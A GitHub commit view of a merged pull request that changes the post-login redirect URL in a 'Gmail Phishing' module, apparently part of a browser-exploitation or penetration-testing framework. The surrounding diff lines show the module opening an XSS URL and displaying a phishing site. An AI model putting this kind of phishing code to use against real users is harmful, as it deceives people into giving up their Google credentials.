Merge pull request #2056 from P-arag/master

Gmail Phishing: Change redirect URL to https://accounts.google.com/

Update post-login redirection URL from https://accounts.google.com/ServiceLogin to
https://accounts.google.com/
This commit is contained in:
bcoles
2021-02-11 17:55:55 +11:00
committed by GitHub

View File

@@ -34,7 +34,7 @@ function redirect(){
window.open(theXssUrl);
window.focus();
}
window.location = "https://accounts.google.com/ServiceLoginAuth";
window.location = "https://accounts.google.com/";
}
function displayPhishingSite(){